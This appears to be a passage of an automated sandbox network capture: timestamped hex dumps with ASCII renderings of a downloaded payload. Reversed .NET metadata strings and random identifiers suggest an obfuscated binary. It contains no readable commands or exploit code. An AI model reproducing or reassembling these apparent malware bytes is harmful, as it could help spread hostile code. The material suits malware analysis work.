                                                      2022-04-20 12:54:01 UTC321INData Raw: de 20 d2 46 71 3b f0 11 2c b2 18 a4 4c aa af 84 03 6e 9f 10 ba 1e b0 b4 5e 0e 46 78 e4 7e eb c9 59 6c 6c 16 16 87 cc b0 04 51 da 6b fa 5a a0 93 1f 0b 72 32 b8 ac 73 63 1f fd 9e a1 d0 33 29 9d 3c 68 94 a7 b0 8d cc e2 2a 35 6e 06 5e bd 92 64 ce 81 27 68 43 ab c2 88 85 f4 67 8d 03 90 d3 aa 65 e4 e6 ef 46 0a bd 3e 0f a1 2e d6 f9 f8 a0 c8 5b e3 59 2c 47 cd d1 79 81 b4 a4 2d 0c cd 61 2d cc b4 4f aa e4 80 e4 fc 70 b8 4f 83 62 ab b2 2e 48 af 58 73 ef e9 98 50 73 5e 4a 4c 00 67 5a 9b ca 03 ed d3 a2 db 8d d0 0a c9 f1 14 fe 03 9c 60 74 ac 92 cf db 77 15 6b ba 19 04 9a 1e 39 4f ef e1 ae f5 70 9c fa dc e6 9a 3d a8 01 c3 97 56 6a fa 2b c6 87 b6 5d 3d 9f cd 0d 73 bc 49 75 43 46 b9 5a d9 5e 80 2d 71 4e ed 9a b8 7e 75 26 7d 0c cf 3e d4 67 a6 ff fa 2f 46 f9 55 a9 76 c4 b5
                                                      Data Ascii: Fq;,Ln^Fx~YllQkZr2sc3)<h*5n^d'hCgeF>.[Y,Gy-a-OpOb.HXsPs^JLgZ`twk9Op=Vj+]=sIuCFZ^-qN~u&}>g/FUv
                                                      2022-04-20 12:54:01 UTC337INData Raw: a9 c3 4a 07 e3 9e 1c a4 08 b0 d1 8f 6d 41 3c 5a e8 2f 9a 8d 6c 68 1a 8c 43 83 d7 23 ce 03 3e 5b 2d 7c ff 44 fc f3 30 f3 a7 96 94 ac 5e 9e ae 8a 43 e2 64 a2 b2 05 4c 60 9c 09 1c 37 1a eb 0e f9 6d 85 77 12 39 15 f1 51 59 67 24 5d ba 2d b0 fa a6 07 65 39 5b 1a cd ca 0c 5e a1 2e a1 99 14 bc eb ff 6d 63 6e 73 b9 2d 42 28 7b 5f 1a df 96 97 3e 87 ba b0 5c e1 cb f5 e7 3a 81 80 4d 73 37 9e c9 73 58 b2 ca 16 e7 04 d4 5b 6a a2 1e e4 83 c9 f1 78 83 6f ff 78 f3 d1 16 46 57 65 63 48 35 d7 60 bc e9 2a e0 6e 4d 82 e6 19 79 90 f9 ad e6 5c 17 af 19 ca c5 c8 bd 44 7b be de fe 15 8a 32 7c a8 73 3c 25 92 fb c5 d1 0f 74 f8 08 a2 e9 c3 91 f5 7f 90 d0 41 d5 2c 68 96 ec fc 9d 3c f1 d9 fd e1 9a d6 b5 cd ae 34 e2 83 0d dc bc f3 e3 a5 68 9f b2 61 e8 8b 77 e2 f5 27 77 96 68 ca 05 67
                                                      Data Ascii: JmA<Z/lhC#>[-|D0^CdL`7mw9QYg$]-e9[^.mcns-B({_>\:Ms7sX[jxoxFWecH5`*nMy\D{2|s<%tA,h<4haw'whg
                                                      2022-04-20 12:54:01 UTC353INData Raw: f6 d5 d3 e0 dd 31 dc 6a b4 48 40 a3 0e dd 3a 9e 61 6f 08 8c 05 17 36 bc 55 c9 9a ca a5 15 ca e9 1b c0 8f 0a 7f c7 d7 71 17 99 c3 49 b5 bf 46 ab 2b c7 36 2f d3 3c bc c0 b5 07 10 7f 7f 0a 65 f8 d0 7d a4 44 cd b9 5a 3d 46 04 9d b2 5a ae cc be be 17 11 89 17 ad b0 cf 53 45 54 e1 d2 3b 13 81 1b 53 14 6e 90 82 8b 73 4d 8e 02 a5 3d bf 5e d8 af db e1 d9 17 c8 fe 31 e2 08 fc 58 b5 3a a7 35 f6 4f ca 12 3c 53 aa de 5b 6d 0f 63 c8 37 15 8a 7c e2 a1 94 f9 85 65 24 43 bf 2c 6a d7 61 fc ce 3a ae e0 82 35 f1 de 77 ce 8a 6f 76 71 9a 7a 63 36 93 67 6e ad b3 43 0b 67 0b a2 ea 9c 14 ef f7 7d 21 7a af a0 64 9c f2 3f d0 4f c0 bf ce 67 d1 84 f8 50 7a 16 7c 4b 84 9a 85 17 a9 d2 ca 6a 55 69 a6 2a 97 bc 2f e1 48 1a 4c 71 db b7 24 cf 21 82 cb 9d 10 17 7b 36 80 73 86 a0 5e c5 8e bc
                                                      Data Ascii: 1jH@:ao6UqIF+6/<e}DZ=FZSET;SnsM=^1X:5O<S[mc7|e$C,ja:5wovqzc6gnCg}!zd?OgPz|KjUi*/HLq$!{6s^
                                                      2022-04-20 12:54:01 UTC369INData Raw: a3 19 a3 de 3b 63 94 9a 3b 8b 4b e0 77 18 14 92 06 96 58 4b 3c 4c 87 ac 40 73 65 6b e2 1a ab 6b 67 53 06 38 43 2d 48 dc 5f 77 a7 89 36 e9 b3 55 31 f4 95 03 4d 01 aa c4 e1 0d d2 f3 3c a4 3e 77 de 4d dd a6 17 57 73 36 f9 25 88 bb 46 90 74 8e 38 ad 24 40 c8 c1 1a 7c 9b df 43 89 3d ed fe b4 b5 31 35 57 c7 50 b6 05 73 78 6d c2 b2 66 a5 a1 bd 26 57 23 6d 10 a8 50 34 36 0c a2 00 b5 af 73 b9 b4 08 a6 b1 56 25 48 1d f1 e4 93 2e be 15 87 67 62 b2 66 ed b7 86 86 26 cb ce 80 c3 b9 c1 fd a3 68 75 dd fe e7 42 96 94 17 5a ca 3d e1 d8 e0 48 d0 cf 5b 72 40 0b b8 a2 60 62 c4 82 16 f2 04 98 74 f8 cb d0 62 2b 47 69 ec d9 9e c4 4d f7 7d a9 d7 1d e5 b9 ac 44 bb 74 b6 51 45 e8 2e 26 24 6b e0 2c 0d 1c 02 6f b8 34 fa a9 90 e6 c7 04 3b 6d ca 27 18 2d 1d d6 07 d5 91 6a 3d d6 6f dc
                                                      Data Ascii: ;c;KwXK<L@sekkgS8C-H_w6U1M<>wMWs6%Ft8$@|C=15WPsxmf&W#mP46sV%H.gbf&huBZ=H[r@`btb+GiM}DtQE.&$k,o4;m'-j=o
                                                      2022-04-20 12:54:01 UTC385INData Raw: 48 53 ec 4c 4e fd fa a8 6d 73 bd 45 e3 50 03 9f 1b c6 e8 ed ff 91 0e 7d d5 51 dd 9d e5 a1 43 12 5f 21 78 97 c4 19 82 1e b3 fd cf 04 50 2b 54 5e 6a a1 79 75 62 e1 ad c0 62 1b c6 d2 9d e2 b8 6e f3 26 3e 03 c5 e1 51 37 d0 16 0a f6 bd d5 72 38 a5 fc 0d 8e a1 16 57 0b 0c 0d 58 d2 93 0e b9 8f 96 fc 67 30 78 02 ee 9c ae f5 9c e9 2d 06 26 b2 a2 9c cd 99 53 53 19 b5 db 33 39 24 70 ee 8b 15 f9 75 01 93 ca bb 2c 41 75 13 22 7e 65 8a 4c 08 c1 ad 6c 33 48 e5 e8 14 15 8f ac 11 56 da 2e f1 eb 6e e3 dd 53 b2 5d 8f 45 37 23 0f bc 9c 60 d7 94 6c 97 9c 2b 4d ef 30 b3 74 c5 f5 b9 e6 cd 7d 5e ed 3b c4 67 60 0c 7e 44 90 5d f8 6a b1 00 7d 43 96 d0 6c b9 86 df 79 0a 29 bc 28 f2 ee fa 43 e9 b5 e3 6b 38 ec 7d 6d 84 0d e9 53 be 30 c2 a1 3d ab c5 21 56 33 fb f0 da b5 69 31 d4 e2 b2
                                                      Data Ascii: HSLNmsEP}QC_!xP+T^jyubbn&>Q7r8WXg0x-&SS39$pu,Au"~eLl3HV.nS]E7#`l+M0t}^;g`~D]j}Cly)(Ck8}mS0=!V3i1
                                                      2022-04-20 12:54:01 UTC401INData Raw: fe dc 97 1f d8 a8 4f 68 53 02 86 94 cb db 6e 96 cc 78 00 f3 82 0e a2 90 52 83 b5 7c 0c 62 cb d9 c0 a4 a0 f1 9d 81 74 56 0b bf 8e 93 07 e5 5d 78 fd 7d c5 7e bb d5 d9 0a f8 60 69 0c da f9 bc c8 77 a7 f6 cd 75 da 2a a6 1b 13 da 62 7a 3b 11 77 bc b2 0b 5d a5 78 0a 79 5d 8e 0e 19 8d 52 5c c5 96 9c 93 5a 31 40 13 8b ea 70 83 50 5d 45 57 c4 c4 4e d8 1e df 20 39 8f 15 a3 40 b4 0d 5e f8 2e 4c 27 33 b5 49 d6 c9 cc 70 27 55 a0 ae 67 89 d9 d7 39 6d f2 be 8b c3 41 0c 8d 5b 65 af 9f 65 25 4f 2b fd 49 fc eb dc 43 33 6f 5e 2d 5a 2a 88 0f c9 e6 bb 4b 42 16 c4 ed de c8 e0 10 18 d2 c1 4c 8f 23 1d 66 4e 70 c0 9b 86 44 ff d1 f4 9b 5d b4 4f 78 4d 3b d7 df 4c 4d 1e 18 67 ca f1 da f2 3d 8e 08 bf 7c 85 41 af cb 3e 49 fc c6 b1 71 2b c9 67 28 19 0b 5f f4 7f f3 4b 51 45 b4 27 0d 1f
                                                      Data Ascii: OhSnxR|btV]x}~`iwu*bz;w]xy]R\Z1@pP]EWN 9@^.L'3Ip'Ug9mA[ee%O+IC3o^-Z*KBL#fNpD]OxM;LMg=|A>Iq+g(_KQE'
                                                      2022-04-20 12:54:01 UTC417INData Raw: 07 09 08 dc 85 11 dc 85 11 dc 85 11 f4 85 12 05 81 12 06 07 12 f4 85 12 e8 84 12 05 81 12 01 03 20 0c 08 45 81 11 e5 81 12 03 07 09 f4 85 12 0e 05 81 12 01 03 20 0a 3d 81 12 1d b5 81 12 1d 3d 81 12 08 08 3d 81 12 1d 05 81 12 07 07 16 f4 85 12 0e 01 02 20 07 05 81 12 0e 05 81 12 01 03 20 0a 05 81 12 0e 01 02 20 07 f4 85 12 08 02 07 06 f4 85 12 05 81 12 f4 85 12 02 20 0b 08 08 45 81 11 03 07 07 05 45 81 11 01 02 20 07 05 08 45 81 11 08 04 07 08 f4 85 12 01 01 20 06 65 81 12 01 01 20 06 65 81 12 65 81 12 08 08 08 05 07 0b 0a 45 81 11 01 02 20 07 0d 45 81 11 01 02 20 07 0d 01 01 20 04 0c 01 01 20 04 0e 45 81 11 01 02 20 07 02 05 81 12 05 81 12 1d 05 81 12 0e 01 05 20 0f 08 08 05 81 12 05 81 12 1d 04 07 0b 05 81 12 bc 85 12 02 02 05 81 12 01 05 20 0e 0e 05 81
                                                      Data Ascii: E === EE E e eeE E E
                                                      2022-04-20 12:54:01 UTC433INData Raw: 12 15 0e 1d 18 18 0e 0e 07 17 02 18 18 02 00 05 18 06 01 00 04 18 08 01 00 04 08 18 02 02 02 08 08 02 0e 02 08 08 08 06 08 08 08 0a 0a 08 18 08 16 07 18 02 0e 18 18 03 00 06 18 0a 01 00 04 18 0e 01 00 04 70 11 18 02 02 02 18 18 08 18 60 11 18 09 09 dc 80 11 0e 07 14 02 a5 81 12 d9 80 12 18 a1 81 12 9d 81 12 06 07 10 02 18 08 02 02 18 06 07 08 02 02 0e 0e 18 04 00 07 18 6c 11 02 64 11 08 18 06 07 0a 0e 18 01 00 04 1c 1d 1c 01 20 05 1c 4d 82 12 02 07 06 1c 1d 10 05 81 12 18 1c 03 00 0a 1c 18 02 07 04 02 02 1c 1d 10 05 81 12 0e 0e 1c 06 00 0d 6c 82 12 06 04 68 82 12 00 00 05 18 18 01 02 00 05 0a 18 01 00 04 09 60 81 11 60 81 11 02 02 02 18 02 02 02 02 02 02 18 08 68 81 11 08 18 02 13 07 1b 02 08 02 0e 0e 60 81 11 05 00 0a 68 82 12 06 04 64 82 12 00 00 05 03
                                                      Data Ascii: p`ld Mlh``h`hd
                                                      2022-04-20 12:54:01 UTC440INData Raw: 09 02 0e 05 81 12 02 00 07 29 81 12 02 1c 08 1d 81 12 19 81 12 08 25 81 12 02 3d 81 12 18 11 81 12 39 81 12 18 05 81 12 21 81 12 10 07 24 3d 81 12 18 01 00 06 05 81 12 65 81 12 01 20 08 08 18 01 00 04 08 00 00 03 61 81 11 29 81 12 19 81 12 02 20 0b 25 81 12 00 00 05 1c 1d 15 81 12 01 02 20 08 05 81 12 1d 05 81 12 5d 81 11 0e 39 81 12 04 20 10 08 45 81 11 01 02 20 07 11 81 12 00 20 05 0e 3d 81 12 01 20 06 6d 12 00 20 04 1c 1d 1c 1c 02 20 06 0e 1d 81 12 01 20 06 55 81 11 0e 21 81 12 02 20 09 08 08 51 81 12 08 51 81 12 01 05 00 0c 45 81 11 01 01 20 06 45 81 11 06 04 31 81 12 01 01 20 06 15 81 12 1d 00 20 06 05 81 12 00 20 05 08 18 08 05 1d 01 04 00 08 05 81 12 18 02 02 02 02 02 1c 1d 05 81 12 05 81 12 1d 3d 81 12 08 05 81 12 1d 6d 12 6d 12 18 18 3d 81 12 08
                                                      Data Ascii: )%=9!$=e a) % ]9 E = m U! QQE E1 =mm=
                                                      2022-04-20 12:54:01 UTC456INData Raw: 51 56 65 37 51 4f 30 79 6c 78 00 48 4f 61 66 77 73 30 53 5a 78 00 78 46 72 37 76 57 30 75 6e 73 00 37 36 41 71 32 68 30 43 6c 68 00 30 33 78 43 4d 70 30 41 6c 58 00 75 4c 4a 6e 4a 5a 30 34 55 42 00 71 59 44 76 38 72 30 32 37 61 00 45 56 35 72 45 76 30 6b 31 4f 00 49 4d 61 57 44 71 30 49 31 76 00 76 4d 6b 37 74 36 30 61 4e 6a 00 66 61 69 46 4c 77 30 31 34 47 00 6b 72 62 52 57 4a 30 5a 48 64 00 76 4b 6f 77 72 32 30 73 79 67 00 52 58 79 79 6e 51 30 36 45 64 00 61 69 6c 50 77 6c 30 37 46 55 00 53 6d 66 4e 79 39 30 68 47 58 00 51 41 33 31 6f 37 30 6d 46 58 00 56 33 68 4e 30 7a 47 37 58 53 00 44 44 77 56 6e 4b 47 50 70 63 00 41 73 37 62 69 44 47 4a 4a 53 00 4a 4a 56 54 49 75 47 44 61 66 00 61 73 76 43 36 34 47 53 4b 4d 00 31 43 35 58 64 59 47 6d 6e 47 00 70 6f
                                                      Data Ascii: QVe7QO0ylxHOafws0SZxxFr7vW0uns76Aq2h0Clh03xCMp0AlXuLJnJZ04UBqYDv8r027aEV5rEv0k1OIMaWDq0I1vvMk7t60aNjfaiFLw014GkrbRWJ0ZHdvKowr20sygRXyynQ06EdailPwl07FUSmfNy90hGXQA31o70mFXV3hN0zG7XSDDwVnKGPpcAs7biDGJJSJJVTIuGDafasvC64GSKM1C5XdYGmnGpo
                                                      2022-04-20 12:54:01 UTC472INData Raw: 41 00 61 65 73 38 32 4f 76 31 49 42 00 64 64 41 74 75 6f 68 74 69 57 64 6e 69 46 00 65 74 61 67 65 6c 65 44 65 74 61 65 72 43 00 71 65 43 00 31 60 65 74 61 63 69 64 65 72 50 00 64 6f 68 74 65 4d 63 69 6d 61 6e 79 44 00 65 6c 69 70 6d 6f 43 6f 74 75 41 65 6c 62 61 6e 45 00 67 6e 55 56 64 73 76 70 55 4c 00 57 72 33 36 58 57 76 4b 32 72 00 61 6d 65 68 63 53 74 65 47 00 73 65 70 79 54 74 65 47 00 64 6e 69 4b 65 6d 69 54 65 74 61 44 65 7a 69 6c 61 69 72 65 53 00 64 6e 69 4b 65 6d 69 54 65 74 61 44 65 64 75 6c 63 6e 49 5f 74 65 73 00 64 6e 69 4b 65 6d 69 54 65 74 61 44 65 64 75 6c 63 6e 49 5f 74 65 67 00 73 65 70 79 54 65 6c 62 61 65 73 72 61 50 77 6f 6c 6c 41 5f 74 65 73 00 73 65 70 79 54 65 6c 62 61 65 73 72 61 50 77 6f 6c 6c 41 5f 74 65 67 00 73 74 6c 75 61
                                                      Data Ascii: Aaes82Ov1IBddAtuohtiWdniFetageleDetaerCqeC1`etaciderPdohteMcimanyDelipmoCotuAelbanEgnUVdsvpULWr36XWvK2ramehcSteGsepyTteGdniKemiTetaDezilaireSdniKemiTetaDedulcnI_tesdniKemiTetaDedulcnI_tegsepyTelbaesraPwollA_tessepyTelbaesraPwollA_tegstlua
                                                      2022-04-20 12:54:01 UTC488INData Raw: 69 49 00 71 56 38 48 71 4d 41 63 64 75 58 64 69 49 62 49 38 50 7a 00 53 71 6f 35 6f 63 62 43 43 6d 45 49 69 4f 31 67 75 4a 67 00 65 70 79 54 65 74 69 72 57 00 65 70 79 54 65 7a 69 6c 61 69 72 65 53 00 74 6e 75 6f 43 74 6e 65 6d 65 6c 65 00 78 69 66 65 72 50 64 65 6b 63 61 50 65 74 69 72 57 00 64 6c 65 69 46 64 65 6b 63 61 50 72 61 65 6c 43 00 64 6c 65 69 46 64 65 6b 63 61 50 74 65 53 00 6e 61 65 6c 6f 6f 42 65 74 69 72 57 00 6e 6f 69 74 70 65 63 78 45 65 74 61 65 72 43 00 65 75 6c 61 56 6d 75 6e 65 00 65 6c 67 6e 69 53 65 74 69 72 57 00 65 6c 62 75 6f 44 65 74 69 72 57 00 43 53 4d 54 5a 69 4a 77 48 47 00 65 74 79 42 53 65 74 69 72 57 00 65 74 79 42 65 74 69 72 57 00 36 31 74 6e 49 55 65 74 69 72 57 00 36 31 74 6e 49 65 74 69 72 57 00 32 33 74 6e 49 55 65
                                                      Data Ascii: iIqV8HqMAcduXdiIbI8PzSqo5ocbCCmEIiO1guJgepyTetirWepyTezilaireStnuoCtnemelexiferPdekcaPetirWdleiFdekcaPraelCdleiFdekcaPteSnaelooBetirWnoitpecxEetaerCeulaVmuneelgniSetirWelbuoDetirWCSMTZiJwHGetyBSetirWetyBetirW61tnIUetirW61tnIetirW23tnIUe
                                                      2022-04-20 12:54:01 UTC504INData Raw: 00 57 50 62 56 36 4b 51 4c 42 4d 48 44 43 42 41 37 55 45 55 00 4b 4e 56 4e 37 42 76 38 57 79 65 75 43 30 75 71 67 54 76 00 37 69 76 6f 55 71 64 48 71 32 4c 34 43 77 4a 4c 35 69 69 00 77 4f 77 33 52 31 59 37 70 67 38 59 43 35 6b 4f 59 33 64 00 79 59 75 36 6b 4f 6a 51 30 57 70 46 43 41 59 41 47 52 57 00 6e 65 6b 6f 54 61 74 61 64 61 74 65 4d 5f 74 65 67 00 65 4b 63 34 44 79 6c 31 41 6b 00 58 72 6a 65 46 69 6c 61 4d 71 00 55 37 58 79 51 56 6c 52 67 65 00 30 73 5a 6b 62 37 57 56 4a 6f 58 33 43 65 76 37 78 6c 43 00 44 6d 35 32 6a 52 6c 49 70 68 00 59 58 64 75 69 5a 53 48 49 57 4b 45 43 65 76 6d 55 73 4a 00 35 35 38 4e 70 37 73 41 49 39 63 50 43 4e 37 6a 4c 57 66 00 6e 65 6b 6f 74 00 37 4a 5a 73 34 54 70 33 31 68 52 74 43 58 6a 63 4b 64 62 00 41 33 62 6a 31 4c
                                                      Data Ascii: WPbV6KQLBMHDCBA7UEUKNVN7Bv8WyeuC0uqgTv7ivoUqdHq2L4CwJL5iiwOw3R1Y7pg8YC5kOY3dyYu6kOjQ0WpFCAYAGRWnekoTatadateM_tegeKc4Dyl1AkXrjeFilaMqU7XyQVlRge0sZkb7WVJoX3Cev7xlCDm52jRlIphYXduiZSHIWKECevmUsJ558Np7sAI9cPCN7jLWfnekot7JZs4Tp31hRtCXjcKdbA3bj1L
                                                      2022-04-20 12:54:01 UTC520INData Raw: 65 6c 65 53 00 65 72 65 68 57 00 32 60 63 6e 75 46 00 65 67 6e 61 52 00 65 72 6f 43 2e 6d 65 74 73 79 53 00 71 6e 69 4c 2e 6d 65 74 73 79 53 00 65 6c 62 61 72 65 6d 75 6e 45 00 65 73 72 61 50 00 6d 65 74 49 5f 74 65 67 00 32 60 72 69 61 50 65 75 6c 61 56 79 65 4b 00 72 6f 74 61 72 65 6d 75 6e 45 00 65 74 79 42 00 32 60 79 72 61 6e 6f 69 74 63 69 44 00 38 6c 73 47 52 55 39 56 67 00 6c 48 43 67 78 62 76 43 66 00 73 64 6e 6f 63 65 53 6c 61 74 6f 54 5f 74 65 67 00 77 6f 4e 5f 74 65 67 00 74 63 61 72 74 62 75 53 00 74 78 65 4e 00 6e 61 70 53 65 6d 69 54 00 65 6d 69 54 65 74 61 44 00 65 6c 62 75 6f 44 00 6d 6f 64 6e 61 52 00 32 33 74 6e 49 55 00 57 44 39 35 30 64 6a 43 48 00 79 74 69 6c 61 75 71 45 5f 70 6f 00 6f 72 65 5a 00 72 74 50 74 6e 49 00 65 6c 64 6e 61
                                                      Data Ascii: eleSerehW2`cnuFegnaReroC.metsySqniL.metsySelbaremunEesraPmetI_teg2`riaPeulaVyeKrotaremunEetyB2`yranoitciD8lsGRU9VglHCgxbvCfsdnoceSlatoT_tegwoN_tegtcartbuStxeNnapSemiTemiTetaDelbuoDmodnaR23tnIUWD950djCHytilauqE_pooreZrtPtnIeldna
                                                      2022-04-20 12:54:01 UTC536INData Raw: 00 00 03 b1 00 00 20 a3 00 00 02 bc 00 00 24 36 00 00 03 f9 00 00 24 30 00 00 03 de 00 00 18 b4 00 00 03 95 00 00 20 a3 00 00 03 97 00 00 18 b4 00 00 02 ba 00 00 18 b4 00 00 02 b8 00 00 24 2c 00 00 02 af 00 00 20 a3 00 00 03 95 00 00 20 a7 00 00 03 97 00 00 18 b4 00 00 02 ba 00 00 20 a3 00 00 02 b8 00 00 20 a3 00 00 02 af 00 00 18 b4 00 00 03 97 00 00 18 b4 00 00 02 ba 00 00 18 b4 00 00 02 b8 00 00 18 af 00 00 02 af 00 00 01 15 01 7d 01 11 01 78 00 fc 01 75 00 f9 01 74 00 f8 01 72 00 f7 01 71 00 f6 01 70 00 f4 01 6d 00 f0 01 6c 00 ed 01 6a 00 ec 01 68 00 e5 01 66 00 da 01 61 00 d8 01 5f 00 c3 01 5c 00 bd 01 5b 00 bb 01 58 00 ba 01 57 00 b8 01 56 00 b7 01 55 00 b5 01 54 00 b3 01 53 00 b0 01 52 00 af 01 51 00 ae 01 50 00 ad 01 4f 00 ac 01 4e 00 a9 01 4d 00
                                                      Data Ascii: $6$0 $, }xutrqpmljhfa_\[XWVUTSRQPONM
                                                      2022-04-20 12:54:01 UTC552INData Raw: 06 f2 00 00 23 11 02 99 06 eb 00 00 23 05 02 21 06 e6 00 00 22 fd 02 91 06 df 00 00 22 db 02 39 06 d8 00 00 22 cb 02 09 06 d2 00 00 22 c3 00 b1 06 c9 00 00 22 be 02 81 06 5b 00 00 21 68 01 f9 06 26 00 00 00 52 01 f9 06 20 00 00 21 16 02 09 06 17 00 00 20 f2 02 09 05 dc 00 00 20 04 01 c9 03 d9 00 00 1f f7 01 39 05 d2 00 00 1f d1 01 c9 05 cd 00 00 1f c5 01 e1 05 c7 00 00 1f b5 00 09 05 c1 00 00 1f 99 01 d1 05 93 00 00 1e bb 01 c1 05 7b 00 00 1e b0 00 09 05 59 00 00 1e a3 01 a1 05 43 00 00 1e 9b 01 a1 01 21 00 00 1e 93 01 b1 02 fe 00 00 1e 7e 00 3c 03 22 00 00 1e 76 00 44 05 3d 00 00 1d 63 00 09 05 38 00 00 1e 6c 00 44 05 24 00 00 1e 60 00 3c 05 10 00 00 19 ae 00 24 05 0d 00 00 1e 5a 00 09 05 08 00 00 1e 10 00 41 04 f6 00 00 1e 53 01 a1 04 d6 00 00 1e 4c 01
                                                      Data Ascii: ##!""9"""[!h&R ! 9{YC!~<"vD=c8lD$`<$ZASL
                                                      2022-04-20 12:54:01 UTC568INData Raw: 00 01 00 00 00 00 19 57 00 03 00 00 00 00 19 57 00 02 00 00 00 00 19 57 00 01 00 00 00 00 19 57 00 03 00 00 00 00 19 57 00 02 00 00 00 00 19 57 00 01 00 00 00 00 19 57 00 01 00 00 00 00 19 57 00 01 00 00 00 00 19 57 00 02 00 00 00 00 19 57 00 01 00 00 00 00 19 57 00 02 00 00 00 00 19 57 00 01 00 00 00 00 77 52 00 02 00 00 00 00 77 74 00 01 00 00 00 00 76 f6 00 02 00 00 00 00 77 74 00 01 00 00 00 00 19 57 00 03 00 00 00 00 19 57 00 02 00 00 00 00 19 57 00 01 00 00 00 00 19 57 00 02 00 00 00 00 19 57 00 01 00 00 00 00 76 f6 00 02 00 00 00 00 77 74 00 01 00 00 00 00 77 52 00 02 00 00 00 00 77 74 00 01 00 00 00 00 19 57 00 01 00 00 00 00 19 57 00 02 00 00 00 00 19 57 00 01 00 00 00 00 19 57 00 02 00 00 00 00 19 57 00 01 00 00 00 00 76 f6 00 02 00 00 00 00 77
                                                      Data Ascii: WWWWWWWWWWWWwRwtvwtWWWWWvwtwRwtWWWWWvw
                                                      2022-04-20 12:54:01 UTC584INData Raw: 00 01 00 00 00 00 19 57 00 04 00 00 00 00 19 57 00 03 00 00 00 00 19 57 00 02 00 00 00 00 19 57 00 01 00 00 00 00 19 57 00 06 00 00 00 00 19 57 00 05 00 00 00 00 19 57 00 04 00 00 00 00 19 57 00 03 00 00 00 00 19 57 00 02 00 00 00 00 19 57 00 01 00 00 00 00 19 57 00 01 00 00 00 00 19 57 00 01 00 00 00 00 19 57 00 03 00 02 00 00 19 57 00 02 00 00 00 00 19 57 00 01 00 00 00 00 19 57 00 02 00 00 00 00 19 57 00 01 00 00 00 00 19 57 00 04 00 00 00 00 19 57 00 03 00 00 00 00 19 57 00 02 00 00 00 00 19 57 00 01 00 00 00 00 19 57 00 02 20 00 00 00 19 57 00 01 00 00 00 00 19 57 00 01 00 00 00 00 19 57 00 01 00 00 00 00 19 57 00 02 00 00 00 00 19 57 00 01 00 00 00 00 19 57 00 0a 00 00 00 00 19 57 00 09 00 00 00 00 19 57 00 08 00 00 00 00 19 57 00 07 00 00 00 00 19
                                                      Data Ascii: WWWWWWWWWWWWWWWWWWWWWW WWWWWWWWW
                                                      2022-04-20 12:54:01 UTC600INData Raw: 00 00 23 5a 01 c6 00 03 00 00 00 00 0f 23 04 aa 00 00 00 52 18 86 00 03 00 00 00 00 0f 23 02 d4 00 00 18 a3 18 91 00 00 00 05 7f 98 0f 21 69 7d 00 00 5b c3 01 c6 00 03 00 00 00 00 0f 1b 69 6e 00 00 5b 9c 01 c6 00 03 00 00 00 00 0f 17 69 65 00 00 23 5a 01 c6 00 03 00 00 00 00 0f 15 04 aa 00 00 00 52 18 86 00 03 00 00 00 00 0f 15 02 d4 00 00 18 a3 18 91 00 00 00 05 7f 90 0f 13 69 5c 00 00 5b c3 01 c6 00 03 00 00 00 00 0f 0c 69 4b 00 00 5b 9c 01 c6 00 03 00 00 00 00 0f 07 69 40 00 00 23 5a 01 c6 00 03 00 00 00 00 0f 05 04 aa 00 00 00 52 18 86 00 03 00 00 00 00 0f 05 02 d4 00 00 18 a3 18 91 00 00 00 05 7f 88 0f 04 21 6e 00 00 5b c3 01 c6 00 03 00 00 00 00 0e fe 69 32 00 00 5b 9c 01 c6 00 03 00 00 00 00 0e fa 69 2a 00 00 23 5a 01 c6 00 03 00 00 00 00 0e f8 04
                                                      Data Ascii: #Z#R#!i}[in[ie#ZRi\[iK[i@#ZR!n[i2[i*#Z
                                                      2022-04-20 12:54:01 UTC616INData Raw: 00 00 ce 0d 00 93 00 08 00 04 ae 40 0b 08 02 d8 00 00 cd f9 00 93 00 08 00 04 ae 2c 0b 08 02 d4 00 00 18 a3 18 91 00 08 00 04 ae 20 0b 08 02 fe 00 00 1e 7e 01 e6 00 08 00 04 ad c4 0b 08 03 27 00 00 1e 60 09 e6 00 08 00 04 ad a8 0b 08 01 21 00 00 84 29 01 e1 00 08 00 04 ad 8c 0b 07 4c 3c 00 00 00 52 18 83 00 08 00 04 ad 60 0b 06 05 e5 00 00 cd b5 00 93 00 08 00 03 2f a0 0b 06 45 6c 00 00 cd a1 00 93 00 08 00 03 2f 88 0b 06 4c 36 00 00 cd 8d 00 93 00 08 00 03 2f 78 0b 06 02 d8 00 00 cd 79 00 93 00 08 00 03 2f 64 0b 06 02 d4 00 00 18 a3 18 91 00 08 00 03 2f 30 0b 06 01 21 00 00 00 52 18 86 00 08 00 03 2f 00 0b 04 4c 21 00 00 cd 65 00 93 00 08 00 03 2d 6c 0b 03 39 a5 00 00 1c c3 00 83 00 08 00 03 2d 08 0b 02 36 a0 00 00 cd 54 00 83 00 08 00 03 2c f0 0b 01 3b
                                                      Data Ascii: @, ~'`!)L<R`/El/L6/xy/d/0!R/L!e-l9-6T,;
                                                      2022-04-20 12:54:01 UTC632INData Raw: 00 00 93 cf 08 83 00 08 00 01 a4 a0 06 ed 02 fe 00 00 93 b7 08 83 00 08 00 01 a4 88 06 ec 00 fd 00 00 93 a7 08 86 00 08 00 01 a4 1c 06 ec 02 fe 00 00 93 97 08 86 00 08 00 01 a4 08 06 eb 00 fd 00 00 93 85 08 86 00 08 00 01 a3 b8 06 eb 02 fe 00 00 93 73 08 86 00 08 00 01 a3 a0 06 ea 00 fd 00 00 93 66 08 86 00 08 00 01 a3 64 06 ea 02 fe 00 00 93 59 08 86 00 08 00 01 a3 50 06 e9 00 fd 00 00 93 4a 08 86 00 08 00 01 a2 f8 06 e9 02 fe 00 00 93 3b 08 86 00 08 00 01 a2 e4 06 e8 01 2e 00 00 93 34 00 83 00 08 00 01 a2 c8 06 e8 02 f6 00 00 91 44 08 86 00 08 00 01 a2 b8 06 e7 37 43 00 00 91 7b 08 86 00 08 00 01 a2 a0 06 e7 37 3d 00 00 91 6c 08 86 00 08 00 01 a2 90 06 e6 00 f2 00 00 8c 48 08 86 00 08 00 01 a2 78 06 e6 03 d9 00 00 1c b2 08 86 00 08 00 01 a2 68 06 e4 31
                                                      Data Ascii: sfdYPJ;.4D7C{7=lHxh1
